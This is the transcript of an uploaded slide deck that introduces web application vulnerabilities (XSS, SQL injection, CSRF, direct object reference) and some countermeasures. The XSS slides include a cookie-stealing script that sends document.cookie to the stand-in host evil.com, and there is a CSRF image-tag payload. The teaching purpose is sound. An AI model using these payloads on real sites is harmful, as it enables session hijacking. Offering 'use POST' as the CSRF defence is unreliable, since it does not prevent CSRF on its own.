Web Application Security with the Application Security Manager (ASM)
Web application security
-
Upload
jin-castor -
Category
Technology
-
view
297 -
download
4
Transcript of Web application security
![Page 1: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/1.jpg)
Web Application Security
Vulnerabilities, attacks, and countermeasures
Prepared by: Jean Michael Castor
![Page 2: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/2.jpg)
Web Applications
• A web-based application is any application that uses a web browser as a client. The term may also mean a computer software application that is coded in a browser-supported programming language (such as JavaScript, combined with a browser-rendered markup language like HTML) and reliant on a common web browser to render the application executable.
![Page 3: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/3.jpg)
Web Application vs Website
• A web application is an application that’s accessed through a web browser.
• A website is a series of pages or documents that may embed media (images, video, etc) that’s accessed through a web browser over the internet.
![Page 4: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/4.jpg)
Outline
• Introduction• Demo application• Vulnerabilities• Defenses• Tools• Conclusions• Resources
![Page 5: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/5.jpg)
Introduction
• World Wide Web has become a powerful platform for application delivery
• Sensitive data increasingly made available through web applications
• Corresponding rise in number of vulnerabilities discovered and security incidents reported
![Page 6: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/6.jpg)
Confidential data breaches
![Page 7: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/7.jpg)
Demo Application
Login Page
![Page 8: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/8.jpg)
Text Input Pages
![Page 9: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/9.jpg)
Database
![Page 10: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/10.jpg)
VulnerabilitiesWeb Applications are vulnerable of the following:– Misconfiguration– Client-side controls– Authentication errors– Cross-site scripting– SQL injection– Cross-site request forgery
![Page 11: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/11.jpg)
Misconfiguration
• Outdated versions of the server• Outdated versions of third-party web
applications• Guessable passwords– Application– FTP/SSH
• Retrievable source code• Trojaned home machine
![Page 12: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/12.jpg)
Client-side controls
• Do not rely on client-side controls that are not enforced on the server-side– CookieCookie: role=guest/admin
– Hidden form parameters<input type=“hidden” name=“role” value=“guest/admin”>
– JavaScript checksfunction validateRole() { … }
![Page 13: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/13.jpg)
Direct object reference
• A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.
![Page 14: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/14.jpg)
Direct object reference
ID FNAME LNAME
1 Boy George
2 Mio Koh
3 Jubagro Bagro
4 Dodoy Doy
Now, let’s say that this database table were queried in a normal application. Then, the results are presented on the page, and each record in the result list would probably have a link to more detail about each user.
Now, here’s what the url might look like to go view greater detail about Mio:/users/viewDetail?id=2
![Page 15: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/15.jpg)
Authentication errors
• Weak passwords– Enforce strong, easy-to-remember passwords
• Brute forceable– Enforce upper limit on the number of errors in a
given time• Verbose failure messages (“wrong password”)– Do not leak information to attacker
![Page 16: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/16.jpg)
Cross-site scripting (XSS)
1. Attacker injects malicious code into vulnerable web server
![Page 17: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/17.jpg)
Cross-site scripting (XSS)
1. Attacker injects malicious code into vulnerable web server2. Victim visits vulnerable web server
GET /postsCookie: s=01a4b8
![Page 18: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/18.jpg)
Cross-site scripting (XSS)
1. Attacker injects malicious code into vulnerable web server2. Victim visits vulnerable web server3. Malicious code is served to victim by web server
HTTP/1.1 200 OK…<script>…</script>
![Page 19: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/19.jpg)
Cross-site scripting (XSS)
1. Attacker injects malicious code into vulnerable web server2. Victim visits vulnerable web server3. Malicious code is served to victim by web server4. Malicious code executes on the victims with web server’s
privileges
GET /log?s=01a4b8
![Page 20: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/20.jpg)
3 types of XSS
• Reflected: vulnerable application simply “reflects” attacker’s code to its visitors
• Persistent: vulnerable application stores (e.g., in the database) the attacker’s code and presents it to its visitors
• DOM-based: vulnerable application includes pages that use untrusted parts of their DOM model (e.g., document.location, document.URL) in an insecure way
![Page 21: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/21.jpg)
XSS Attacks
• STEALING COOKIE• DEFACEMENT• PHISHING• PRIVACY VIOLATION• RUN EXPLOITS• JAVASCRIPT MALWARE
![Page 22: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/22.jpg)
XSS attacks: STEALING COOKIE• Attacker injects script that reads the site’s cookie• Scripts sends the cookie to attacker• Attacker can now log into the site as the victim
<script>var img = new Image();img.src = “http://evil.com/log_cookie.php?” + document.cookie
</script>
![Page 23: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/23.jpg)
XSS attacks: DEFACEMENT
• Attacker injects script that automatically redirects victims to attacker’s site
<script>document.location = “http://evil.com”;
</script>
![Page 24: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/24.jpg)
XSS attacks: PHISHING
• Attacker injects script that reproduces look-and-feel of “interesting” site (e.g., paypal, login page of the site itself)
• Fake page asks for user’s credentials or other sensitive information
• The data is sent to the attacker’s site
![Page 25: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/25.jpg)
XSS attacks: PRIVACY VIOLATION
• The attacker injects a script that determines the sites the victims has visited in the past
• This information can be leveraged to perform targeted phishing attacks
![Page 26: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/26.jpg)
XSS attacks: RUN EXPLOITS
• The attacker injects a script that launches a number of exploits against the user’s browser or its plugins
• If the exploits are successful, malware is installed on the victim’s machine without any user intervention
• Often, the victim’s machine becomes part of a botnet
![Page 27: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/27.jpg)
XSS attacks: JAVASCRIPT MALWARE
• JavaScript opens up internal network to external attacks– Scan internal network– Fingerprint devices on the internal network– Abuse default credentials of DSL/wireless routers
![Page 28: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/28.jpg)
SQL injection
HTTP Request
POST /login?u=foo&p=bar
SQL Query
SELECT user, pwd FROM users WHERE u = ‘foo’
• Attacker submits HTTP request with a malicious parameter value that modifies an existing SQL query, or adds new queries
![Page 29: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/29.jpg)
SQLI attacks
• Detecting:– Attacker inject special-meaning characters that are
likely to cause an error, e.g., user=“• Consequences:– Violate data integrity– Violate data confidentiality
![Page 30: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/30.jpg)
Cross-site request forgery (CSRF)
1. Victim is logged into vulnerable web site
GET /postsCookie: s=01a4b8
![Page 31: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/31.jpg)
Cross-site request forgery (CSRF)
1. Victim is logged into vulnerable web site2. Victim visits malicious page on attacker web site
GET /index.html
![Page 32: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/32.jpg)
Cross-site request forgery (CSRF)
1. Victim is logged into vulnerable web site2. Victim visits malicious page on attacker web site3. Malicious content is delivered to victim
HTTP 1.1 200 OK…<img src=http://vuln/delete>
![Page 33: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/33.jpg)
Cross-site request forgery (CSRF)
1. Victim is logged into vulnerable web site2. Victim visits malicious page on attacker web site3. Malicious content is delivered to victim4. Victim involuntarily sends a request to the vulnerable web site
GET /deleteCookie: s=01a4b8
![Page 34: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/34.jpg)
CSRF countermeasures
• Use POST instead of GET requests
![Page 35: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/35.jpg)
POST AND GET COMPARISON TABLE• In HTML, one can specify two different submission methods for a form. The method is
specified inside a FORM element, using the METHOD attribute. The difference between METHOD="GET" (the default) and METHOD="POST" is primarily defined in terms of form data encoding. According to the technical HTML specifications GET means that form data is to be encoded (by a browser) into a URL while POST means that the form data is to appear within the message body of the HTTP request.
GET POST
BACK button/Reload Harmless Data will be re-submitted (the browser should alert the user that the data are about to be re-submitted)
Bookmarked Can be bookmarked Cannot be bookmarked
Cached Can be cached Not cached
History Parameters remain in browser history Parameters are not saved in browser history
Restrictions on data type Only ASCII characters allowed No restrictions. Binary data is also allowed
Security
GET is less secure compared to POST because data sent is part of the URL
Never use GET when sending passwords or other sensitive information!
POST is a little safer than GET because the parameters are not stored in browser history or in web server logs
![Page 36: Web application security](https://reader036.fdocuments.net/reader036/viewer/2022081519/554f53acb4c905b9508b4f1a/html5/thumbnails/36.jpg)